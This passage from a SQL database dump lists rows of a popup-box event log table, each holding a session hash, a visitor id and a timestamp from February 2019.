(58353, 'fa3af8aa7edf807b80e4f1a0dfc32b34', '675a337c1c168ee0', 0, 2, 1, '2019-02-10 13:40:58'),
(58354, '5190273cd66a409e746d8d787cd21e21', 'c82195f7827b9487', 0, 2, 1, '2019-02-10 13:52:10'),
(58355, '494a4dafcc2b90bdfe062192a50ec4d6', 'f6704687d47c4f30', 0, 2, 1, '2019-02-10 13:54:33'),
(58356, '494a4dafcc2b90bdfe062192a50ec4d6', 'f6704687d47c4f30', 0, 2, 1, '2019-02-10 13:57:34'),
(58357, '494a4dafcc2b90bdfe062192a50ec4d6', 'f6704687d47c4f30', 0, 2, 1, '2019-02-10 13:59:21'),
(58358, 'a8b9395e4d64d4e6748e84830f6a05a3', '31df4497c171bb9f', 0, 2, 1, '2019-02-10 14:54:38'),
(58359, 'a29db2d5d1d697f4c10f47e88df615f5', '84c73015e9e28e8a', 0, 2, 1, '2019-02-10 14:56:16'),
(58360, '149fd45935d7db94eb225326d7565721', 'a44ac4db884f64d7', 0, 2, 1, '2019-02-10 15:04:05'),
(58361, '149fd45935d7db94eb225326d7565721', 'a44ac4db884f64d7', 0, 2, 1, '2019-02-10 15:04:33'),
(58362, '3e8e44c6deb62ad2b663726e38c27ebe', '84c73015e9e28e8a', 0, 2, 1, '2019-02-10 15:27:03'),
(58363, 'ad9b8913e86d379000a2afa7b7fd50af', '5a6e6fc8df61f23d', 0, 2, 1, '2019-02-10 15:31:20'),
(58364, '8ebcdc8b870cf867049b29b30b1e35a7', 'fdb041098386b7c7', 0, 2, 1, '2019-02-10 15:35:08'),
(58365, '1264a1b04b17e3af761d3d0cc7d5a4a0', '59b129ec0228c68f', 0, 2, 1, '2019-02-10 15:44:03'),
(58366, '0c9baf4cac1db31adea161b78e9820b1', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2019-02-10 15:47:03'),
(58367, '0c9baf4cac1db31adea161b78e9820b1', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2019-02-10 15:47:30'),
(58368, '0c9baf4cac1db31adea161b78e9820b1', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2019-02-10 15:50:13'),
(58369, 'c05f092ebce14c724f9bd82416d4a079', 'e5ae167c0b08b465', 0, 2, 1, '2019-02-10 15:56:59'),
(58370, 'c05f092ebce14c724f9bd82416d4a079', 'e5ae167c0b08b465', 0, 2, 1, '2019-02-10 15:58:41'),
(58371, 'e14132678f4bb1ae78eb9edaf42dafb6', 'f2dcff99c6fde162', 0, 2, 1, '2019-02-10 16:00:11'),
(58372, 'd81f6452deda544a5e0ee1dd54899ebf', '5a6e6fc8df61f23d', 0, 2, 1, '2019-02-10 16:05:51'),
(58373, 'e14132678f4bb1ae78eb9edaf42dafb6', 'f2dcff99c6fde162', 0, 2, 1, '2019-02-10 16:06:49'),
(58374, 'e14132678f4bb1ae78eb9edaf42dafb6', 'f2dcff99c6fde162', 0, 2, 1, '2019-02-10 16:07:22'),
(58375, 'bb6561e1031b87f76c54ac862c377839', '15793fe951634dee', 0, 2, 1, '2019-02-10 16:19:11'),
(58376, '7de103c0578d5baa221aa0634dd1fa28', '77f86148dc5bfa4d', 0, 2, 1, '2019-02-10 16:19:53'),
(58377, 'fb2a262984472153e46845ab565405b7', 'c0db950218ff019e', 0, 2, 1, '2019-02-10 16:31:01'),
(58378, 'd9a9e7e83de7a4d0dbb977595366fd2f', '6a0284b857f3c2f5', 0, 2, 1, '2019-02-10 17:07:59'),
(58379, '79911be925b1f20958546f544ebc55c7', 'a2b92167f54c9dc2', 0, 2, 1, '2019-02-10 17:37:05'),
(58380, '402c5703252810401639c5629b692e49', 'b53c70bea01d2d6e', 0, 2, 1, '2019-02-10 17:59:59'),
(58381, '6c4d4fa1223a76ae8d2e93d501a95ff0', '9b4e9691374cabf9', 0, 2, 1, '2019-02-10 18:10:41'),
(58382, '75b73d40d609201cbb0ddf30885d88a3', 'e7eefaf843bed80b', 0, 2, 1, '2019-02-10 19:14:33'),
(58383, '5f24cba747ad1aa9519c02caef111f18', '4a15b9805f740225', 0, 2, 1, '2019-02-10 19:20:28'),
(58384, '1fa3a4becb44d557909bd9f7dcbb2038', '197517d6a5fb918d', 0, 2, 1, '2019-02-10 19:30:15'),
(58385, '3059c7479ee1a145b9ed1c344564113d', '026ece1bb74addcf', 0, 2, 1, '2019-02-10 19:33:15'),
(58386, 'c195b870c6e5370f31d626deca7bc8a5', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-10 19:40:13'),
(58387, 'c195b870c6e5370f31d626deca7bc8a5', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-10 19:48:58'),
(58388, 'f4e0aa07c258d970c6953dd72c0b0590', '4dca797f4c8a12c2', 0, 2, 1, '2019-02-10 19:50:18'),
(58389, '7d6dce06ac64ca0e6b33b6fc266bd697', '2ef84fb2d317330a', 0, 2, 1, '2019-02-10 20:19:11'),
(58390, '24993f952942c6172c43df5c63ca8025', '7838af6e4ba07ff1', 0, 2, 1, '2019-02-10 20:34:11'),
(58391, '2193b461a997eb7a63fdc955a64b2285', '83a29daf3f641589', 0, 2, 1, '2019-02-10 20:55:22'),
(58392, '57b85b55f39fdf630fe80a78e471f03a', 'c32e12b58b309fc1', 0, 2, 1, '2019-02-10 20:58:24'),
(58393, '24b50c3314e207a7ee325c222e8ceb19', 'ead365992b655192', 0, 2, 1, '2019-02-10 21:05:27'),
(58394, 'c48fec79e0d6af7c9fd1a0b6234ac0bb', '2120e07b4f44278e', 0, 2, 1, '2019-02-10 21:25:52'),
(58395, 'c48fec79e0d6af7c9fd1a0b6234ac0bb', '2120e07b4f44278e', 0, 2, 1, '2019-02-10 21:45:15'),
(58396, 'c195b870c6e5370f31d626deca7bc8a5', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-10 21:45:41'),
(58397, 'c195b870c6e5370f31d626deca7bc8a5', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-10 21:46:09'),
(58398, 'c195b870c6e5370f31d626deca7bc8a5', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-10 21:47:03'),
(58399, 'c195b870c6e5370f31d626deca7bc8a5', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-10 21:47:50'),
(58400, '641a00ead592552ca3b0e60d75368abc', 'ac749fc0301f2533', 0, 2, 1, '2019-02-10 22:01:04'),
(58401, 'c48fec79e0d6af7c9fd1a0b6234ac0bb', '2120e07b4f44278e', 0, 2, 1, '2019-02-10 22:04:08'),
(58402, 'a8d317349494d453d90b2114545ee93a', 'f48a281680106526', 0, 2, 1, '2019-02-10 22:36:57'),
(58403, '34d99723017b18367322cd1597962266', 'ba32395289361d31', 0, 2, 1, '2019-02-10 22:45:58'),
(58404, '34d99723017b18367322cd1597962266', 'ba32395289361d31', 0, 2, 1, '2019-02-10 22:47:22'),
(58405, 'ca821e6f3a484feaa0be50c340d6efd9', '652b04d9e6e00af7', 0, 2, 1, '2019-02-10 23:10:34'),
(58406, 'b360d35f3d85ec0ba8abe3b4fcc16757', 'ece43275c46f0c9a', 0, 2, 1, '2019-02-11 00:50:02'),
(58407, '2be8f2fdaaf417cdfc070d838547e6e1', '41ec8face7cf1ee7', 0, 2, 1, '2019-02-11 03:14:52'),
(58408, 'bf4c3fc7032bbf133837ed0d9ba6eec7', 'e05c8f2102dddd22', 0, 2, 1, '2019-02-11 06:33:20'),
(58409, '08281a94a7980fef10f94e969e416186', 'ce594e18764dec71', 0, 2, 1, '2019-02-11 06:54:06'),
(58410, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-02-11 07:03:37'),
(58411, '8485e61e44479a132f54cc1904955574', 'b3fb8540efdab4b7', 0, 2, 1, '2019-02-11 07:44:36'),
(58412, '8668f205e684ee9a6965dc07cafcaf8e', 'c6c08c57b8a02164', 0, 2, 1, '2019-02-11 07:48:01'),
(58413, '15f92766fbc68d11746800be51d28641', '9a670e3955886bb8', 0, 2, 1, '2019-02-11 07:55:58'),
(58414, '2807eee295a9fc71b3bfd5f310761d4d', 'b53c70bea01d2d6e', 0, 2, 1, '2019-02-11 08:26:23'),
(58415, '397302b970bcd716908688f209aae893', 'aad74cfc2e5a8b02', 0, 2, 1, '2019-02-11 08:42:33'),
(58416, '58c9faa9bff2f42222c42141fbae3535', '35c70b9b93c69a29', 0, 2, 1, '2019-02-11 08:54:44'),
(58417, '58c9faa9bff2f42222c42141fbae3535', '35c70b9b93c69a29', 0, 2, 1, '2019-02-11 08:55:13'),
(58418, '58c9faa9bff2f42222c42141fbae3535', '35c70b9b93c69a29', 0, 2, 1, '2019-02-11 08:55:48'),
(58419, '58c9faa9bff2f42222c42141fbae3535', '35c70b9b93c69a29', 0, 2, 1, '2019-02-11 08:55:54'),
(58420, '58c9faa9bff2f42222c42141fbae3535', '35c70b9b93c69a29', 0, 2, 1, '2019-02-11 08:56:05'),
(58421, 'f4ec21e6ca5555a0c2056eee3901f587', '6551472730717e35', 0, 2, 1, '2019-02-11 08:56:27'),
(58422, '58c9faa9bff2f42222c42141fbae3535', '35c70b9b93c69a29', 0, 2, 1, '2019-02-11 08:57:42'),
(58423, 'f4ec21e6ca5555a0c2056eee3901f587', '6551472730717e35', 0, 2, 1, '2019-02-11 09:36:59'),
(58424, '91193f07bebdf3db97f6d2e59cee4c15', 'd5e0db8faca7ed65', 0, 2, 1, '2019-02-11 09:40:48'),
(58425, '397302b970bcd716908688f209aae893', 'aad74cfc2e5a8b02', 0, 2, 1, '2019-02-11 10:38:30'),
(58426, '7f7dc4ca19b8954a4e507999386ca3b7', 'd1add859dda0a96b', 0, 2, 1, '2019-02-11 11:20:24'),
(58427, 'ee1a5b5a29ecffb92d115e3033b96d2f', '4da9d3931f673cdf', 0, 2, 1, '2019-02-11 11:38:25'),
(58428, 'a1850065a3de4d2e915909dd20de3d8a', '9b4e9691374cabf9', 0, 2, 1, '2019-02-11 11:46:20'),
(58429, 'e84aee1036b937af08090f2ac217a09d', '6551472730717e35', 0, 2, 1, '2019-02-11 12:36:23'),
(58430, 'cb03a3c8db79e8fc80210f559ea8f2e6', '6025eaaefe76898f', 0, 2, 1, '2019-02-11 13:15:54'),
(58431, '1756fbbad234a8adb3764fa66aad22b5', '085a94e0100d444c', 0, 2, 1, '2019-02-11 13:34:54'),
(58432, 'f438585c47fb812ea56a9780dcf6b1e4', '7bf32053be214817', 0, 2, 1, '2019-02-11 13:37:01'),
(58433, 'f438585c47fb812ea56a9780dcf6b1e4', '7bf32053be214817', 0, 2, 1, '2019-02-11 13:39:04'),
(58434, 'f438585c47fb812ea56a9780dcf6b1e4', '7bf32053be214817', 0, 2, 1, '2019-02-11 13:39:39'),
(58435, 'f438585c47fb812ea56a9780dcf6b1e4', '7bf32053be214817', 0, 2, 1, '2019-02-11 13:45:59'),
(58436, 'f438585c47fb812ea56a9780dcf6b1e4', '7bf32053be214817', 0, 2, 1, '2019-02-11 14:00:40'),
(58437, 'f438585c47fb812ea56a9780dcf6b1e4', '7bf32053be214817', 0, 2, 1, '2019-02-11 14:02:13'),
(58438, 'f438585c47fb812ea56a9780dcf6b1e4', '7bf32053be214817', 0, 2, 1, '2019-02-11 14:03:02'),
(58439, 'f438585c47fb812ea56a9780dcf6b1e4', '7bf32053be214817', 0, 2, 1, '2019-02-11 14:03:57'),
(58440, 'f438585c47fb812ea56a9780dcf6b1e4', '7bf32053be214817', 0, 2, 1, '2019-02-11 14:04:12'),
(58441, 'e720d43272250fad13ab03b1a0ca7cfa', '1a53cc48d07addc5', 0, 2, 1, '2019-02-11 14:24:45'),
(58442, '732e272aeec99408938d7f5831428fc2', 'ecd03e4d5ec691e5', 0, 2, 1, '2019-02-11 14:37:30'),
(58443, '732e272aeec99408938d7f5831428fc2', 'ecd03e4d5ec691e5', 0, 2, 1, '2019-02-11 14:38:13'),
(58444, '2d46061ac68a5d7e624fd4b1ea798dd0', '21528143cf090881', 0, 2, 1, '2019-02-11 14:56:41'),
(58445, '931813dedd7d98302300bef0fe3e9912', 'b83ba450ce068879', 0, 2, 1, '2019-02-11 15:13:30'),
(58446, 'e84aee1036b937af08090f2ac217a09d', '6551472730717e35', 0, 2, 1, '2019-02-11 15:26:35'),
(58447, 'e61f8cb77ddf15cac1684b9d3904722f', 'c9364f70ae30f1be', 0, 2, 1, '2019-02-11 15:34:41'),
(58448, 'fc9f4b0f828c2e6d94521ad7b57a0051', '4c68757ba2ad32f3', 0, 2, 1, '2019-02-11 15:44:03'),
(58449, '9aa73a4c14e2ef74c6669a9349562932', '49307abae1715af1', 0, 2, 1, '2019-02-11 16:02:09'),
(58450, 'b23b264e2d504f8993d26b534474b090', '7a22837f03b43aeb', 0, 2, 1, '2019-02-11 16:02:54'),
(58451, 'dfbcd7da541ae3cd6cb598e2f222bca8', '860cf03b280a77a2', 0, 2, 1, '2019-02-11 16:08:27'),
(58452, 'dfbcd7da541ae3cd6cb598e2f222bca8', '860cf03b280a77a2', 0, 2, 1, '2019-02-11 16:08:57'),
(58453, 'b6af1d0534faf61adb342a254ec84233', '66f95d9484b42d25', 0, 2, 1, '2019-02-11 16:13:46'),
(58454, 'b6af1d0534faf61adb342a254ec84233', '66f95d9484b42d25', 0, 2, 1, '2019-02-11 16:17:29'),
(58455, 'b6af1d0534faf61adb342a254ec84233', '66f95d9484b42d25', 0, 2, 1, '2019-02-11 16:17:57'),
(58456, 'b6af1d0534faf61adb342a254ec84233', '66f95d9484b42d25', 0, 2, 1, '2019-02-11 16:18:53'),
(58457, 'b6af1d0534faf61adb342a254ec84233', '66f95d9484b42d25', 0, 2, 1, '2019-02-11 16:19:22'),
(58458, 'b6af1d0534faf61adb342a254ec84233', '66f95d9484b42d25', 0, 2, 1, '2019-02-11 16:19:58'),
(58459, 'ee2421b20f4230a0fbd173e905cc9550', 'd4320e09b4d9d7c2', 0, 2, 1, '2019-02-11 16:38:57'),
(58460, 'ee2421b20f4230a0fbd173e905cc9550', 'd4320e09b4d9d7c2', 0, 2, 1, '2019-02-11 16:40:27'),
(58461, 'ee2421b20f4230a0fbd173e905cc9550', 'd4320e09b4d9d7c2', 0, 2, 1, '2019-02-11 16:42:05'),
(58462, 'ee2421b20f4230a0fbd173e905cc9550', 'd4320e09b4d9d7c2', 0, 2, 1, '2019-02-11 16:42:44'),
(58463, 'ee2421b20f4230a0fbd173e905cc9550', 'd4320e09b4d9d7c2', 0, 2, 1, '2019-02-11 16:43:43'),
(58464, '6eb241651ce76face9d2fb7bee1ab120', 'bf9a853d518964aa', 0, 2, 1, '2019-02-11 16:49:35'),
(58465, 'd68dd143820402b81ae84e478836b79d', 'e793b6887430710e', 0, 2, 1, '2019-02-11 17:50:39'),
(58466, 'd68dd143820402b81ae84e478836b79d', 'e793b6887430710e', 0, 2, 1, '2019-02-11 17:57:37'),
(58467, 'b9a7de177c2428d9af65f7e86d86aaf8', '8cbd108d0ef53a81', 0, 2, 1, '2019-02-11 18:22:08'),
(58468, '192efa4ecbcb99831a1a845035588bab', '6a2a1cd680095c5a', 0, 2, 1, '2019-02-11 18:57:34'),
(58469, '89952aa128029812cf8150df9e86a460', '3affdb6d237dd814', 0, 2, 1, '2019-02-11 19:10:05'),
(58470, 'b08810f90f6e801e09bee9be67277360', 'ec298f16abca1ffa', 0, 2, 1, '2019-02-11 19:38:54'),
(58471, 'b08810f90f6e801e09bee9be67277360', 'ec298f16abca1ffa', 0, 2, 1, '2019-02-11 19:40:00'),
(58472, 'f8ed125a7cc2c55e6a7907806071fadf', 'cea08e1a9db6a08f', 0, 2, 1, '2019-02-11 19:48:27'),
(58473, '249bb70f66f9c1bbac9b99d8bb501d2e', 'c020abbb40884763', 0, 2, 1, '2019-02-11 20:08:12'),
(58474, '249bb70f66f9c1bbac9b99d8bb501d2e', 'c020abbb40884763', 0, 2, 1, '2019-02-11 20:08:19'),
(58475, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-11 20:18:25'),
(58476, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-11 20:18:30'),
(58477, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 20:19:11'),
(58478, '7527301751d642b0e13e6098d19e5aff', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-11 20:19:28'),
(58479, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 20:19:47'),
(58480, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 20:20:08'),
(58481, 'd77d141e794156d12dee7f386f93b7d7', '8e0589df61cad931', 0, 2, 1, '2019-02-11 20:20:09'),
(58482, 'e6b48bd5eaedb7ad4ef70017a5d75b4a', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-11 20:20:34'),
(58483, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 20:23:34'),
(58484, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 20:24:13'),
(58485, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 20:24:25'),
(58486, '371e48a08b3e509753a77dd50bbcaa85', '60be33ea30c49f44', 0, 2, 1, '2019-02-11 20:26:12'),
(58487, 'e6b48bd5eaedb7ad4ef70017a5d75b4a', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-11 20:26:25'),
(58488, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 20:26:30'),
(58489, '371e48a08b3e509753a77dd50bbcaa85', '60be33ea30c49f44', 0, 2, 1, '2019-02-11 20:26:43'),
(58490, '371e48a08b3e509753a77dd50bbcaa85', '60be33ea30c49f44', 0, 2, 1, '2019-02-11 20:27:27'),
(58491, '371e48a08b3e509753a77dd50bbcaa85', '60be33ea30c49f44', 0, 2, 1, '2019-02-11 20:27:46'),
(58492, '249bb70f66f9c1bbac9b99d8bb501d2e', 'c020abbb40884763', 0, 2, 1, '2019-02-11 20:27:59'),
(58493, 'e6b48bd5eaedb7ad4ef70017a5d75b4a', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-11 20:28:04'),
(58494, '371e48a08b3e509753a77dd50bbcaa85', '60be33ea30c49f44', 0, 2, 1, '2019-02-11 20:28:12'),
(58495, 'e6b48bd5eaedb7ad4ef70017a5d75b4a', 'abc5ec7aefe03208', 0, 2, 1, '2019-02-11 20:30:42'),
(58496, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 20:34:00'),
(58497, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 20:34:25'),
(58498, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 20:36:28'),
(58499, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 20:41:02'),
(58500, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 20:43:30'),
(58501, '5177f0c3bbdae929504762e5baae482d', 'b4ecb18ba7992a18', 0, 2, 1, '2019-02-11 20:43:49'),
(58502, '5177f0c3bbdae929504762e5baae482d', 'b4ecb18ba7992a18', 0, 2, 1, '2019-02-11 20:46:37');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(58503, '5177f0c3bbdae929504762e5baae482d', 'b4ecb18ba7992a18', 0, 2, 1, '2019-02-11 20:47:45'),
(58504, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 20:48:16'),
(58505, '5177f0c3bbdae929504762e5baae482d', 'b4ecb18ba7992a18', 0, 2, 1, '2019-02-11 20:48:54'),
(58506, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 20:50:47'),
(58507, '5177f0c3bbdae929504762e5baae482d', 'b4ecb18ba7992a18', 0, 2, 1, '2019-02-11 20:52:12'),
(58508, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 20:53:37'),
(58509, '832101422a765b14fbaf3b9b7abfec87', 'b453f7c003bf64ff', 0, 2, 1, '2019-02-11 20:57:11'),
(58510, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 20:57:22'),
(58511, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 20:57:26'),
(58512, '4dc7abb4edf7c22f8f4c0100bb9e558c', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 20:57:37'),
(58513, '7527301751d642b0e13e6098d19e5aff', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-11 20:58:56'),
(58514, '7527301751d642b0e13e6098d19e5aff', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-11 20:58:58'),
(58515, 'e416c09c3f9dc47098ef90ee6cf0cf6f', '7bfc1f0d81f65cd3', 0, 2, 1, '2019-02-11 20:59:03'),
(58516, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-11 20:59:09'),
(58517, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 20:59:29'),
(58518, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 20:59:50'),
(58519, '4dc7abb4edf7c22f8f4c0100bb9e558c', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 20:59:52'),
(58520, '4dc7abb4edf7c22f8f4c0100bb9e558c', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 21:00:02'),
(58521, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 21:00:34'),
(58522, '4dc7abb4edf7c22f8f4c0100bb9e558c', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 21:00:59'),
(58523, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 21:01:04'),
(58524, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 21:01:07'),
(58525, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:01:55'),
(58526, '4dc7abb4edf7c22f8f4c0100bb9e558c', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 21:01:58'),
(58527, '4dc7abb4edf7c22f8f4c0100bb9e558c', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 21:02:08'),
(58528, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-11 21:03:05'),
(58529, 'c16699842cecc25a90f550f82a944218', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 21:03:32'),
(58530, '5a547b0e3d6481c73177040f05a17d13', '7501b42c35accff7', 0, 2, 1, '2019-02-11 21:03:34'),
(58531, 'a8722bed0c7796e0d178e2293b2dfa1c', '6acd603860f9a799', 0, 2, 1, '2019-02-11 21:04:02'),
(58532, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-11 21:04:09'),
(58533, 'c16699842cecc25a90f550f82a944218', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 21:04:10'),
(58534, 'c16699842cecc25a90f550f82a944218', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 21:04:32'),
(58535, '0e532329097ca01d5bb585f84f7fc04e', '196ae7616c94df27', 0, 2, 1, '2019-02-11 21:04:33'),
(58536, 'd77d141e794156d12dee7f386f93b7d7', '8e0589df61cad931', 0, 2, 1, '2019-02-11 21:04:43'),
(58537, 'c16699842cecc25a90f550f82a944218', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 21:04:47'),
(58538, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-11 21:04:59'),
(58539, 'c16699842cecc25a90f550f82a944218', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 21:05:26'),
(58540, '475ac16d15862f59d14787faf7de1582', '3c0ef43b583fe622', 0, 2, 1, '2019-02-11 21:06:20'),
(58541, '475ac16d15862f59d14787faf7de1582', '3c0ef43b583fe622', 0, 2, 1, '2019-02-11 21:06:49'),
(58542, '475ac16d15862f59d14787faf7de1582', '3c0ef43b583fe622', 0, 2, 1, '2019-02-11 21:07:13'),
(58543, 'b8514ec0ffd5cb7168a63f8e4b4bcd73', '503a514a8daa32a7', 0, 2, 1, '2019-02-11 21:07:51'),
(58544, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:07:58'),
(58545, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:08:12'),
(58546, '8672a3780296bca7ebcda1030e33561a', '0bf16c319bd2f666', 0, 2, 1, '2019-02-11 21:08:54'),
(58547, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:09:02'),
(58548, 'a8722bed0c7796e0d178e2293b2dfa1c', '6acd603860f9a799', 0, 2, 1, '2019-02-11 21:09:57'),
(58549, '832101422a765b14fbaf3b9b7abfec87', 'b453f7c003bf64ff', 0, 2, 1, '2019-02-11 21:10:35'),
(58550, 'd6eed245b021fabbf771f128c6957873', '68e262710bf07c1c', 0, 2, 1, '2019-02-11 21:10:45'),
(58551, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:11:03'),
(58552, 'c16699842cecc25a90f550f82a944218', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 21:11:13'),
(58553, 'e416c09c3f9dc47098ef90ee6cf0cf6f', '7bfc1f0d81f65cd3', 0, 2, 1, '2019-02-11 21:11:31'),
(58554, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-11 21:11:35'),
(58555, '5e9f1cce40718ceb9e27ea181c9368a8', 'db1b55aa7bb7987d', 0, 2, 1, '2019-02-11 21:12:04'),
(58556, '5cc70c031e517e02ba3df1c0a77c418f', '5c5e2b57fcb5351b', 0, 2, 1, '2019-02-11 21:12:06'),
(58557, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:12:18'),
(58558, 'a85bd92f275748fbfe48b52246755dc2', 'e706e9a0184b2202', 0, 2, 1, '2019-02-11 21:12:28'),
(58559, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:12:45'),
(58560, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:12:48'),
(58561, 'd6eed245b021fabbf771f128c6957873', '68e262710bf07c1c', 0, 2, 1, '2019-02-11 21:13:02'),
(58562, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:13:06'),
(58563, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:13:37'),
(58564, 'c16699842cecc25a90f550f82a944218', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-11 21:14:58'),
(58565, 'd6eed245b021fabbf771f128c6957873', '68e262710bf07c1c', 0, 2, 1, '2019-02-11 21:15:08'),
(58566, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:15:26'),
(58567, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:15:35'),
(58568, 'b0ae76c057d54d005e6710ba398cc274', '306f3dfe7368fe24', 0, 2, 1, '2019-02-11 21:16:26'),
(58569, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:16:42'),
(58570, '5116df440cdc9380c406438871452f87', '8e0589df61cad931', 0, 2, 1, '2019-02-11 21:18:05'),
(58571, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:18:32'),
(58572, 'aedfde1a834742bf7a7907c65e3e1e63', '12ed21842ec29d17', 0, 2, 1, '2019-02-11 21:18:46'),
(58573, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:18:54'),
(58574, '9640d31f5fb924fcb6bc53f3c149099c', '83e475d8a3eea7c6', 0, 2, 1, '2019-02-11 21:19:01'),
(58575, '9640d31f5fb924fcb6bc53f3c149099c', '83e475d8a3eea7c6', 0, 2, 1, '2019-02-11 21:19:14'),
(58576, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:19:17'),
(58577, '81de6172ae2d2a59d0c537018de9abfa', '932e93c57311c1b1', 0, 2, 1, '2019-02-11 21:19:26'),
(58578, '35dddf76ecb69cf7adf68706665bcdae', 'df27b9a2919a8206', 0, 2, 1, '2019-02-11 21:19:30'),
(58579, '5dae9b4c9ab37adad3da61b622784ce1', 'c75467138ec67c24', 0, 2, 1, '2019-02-11 21:19:45'),
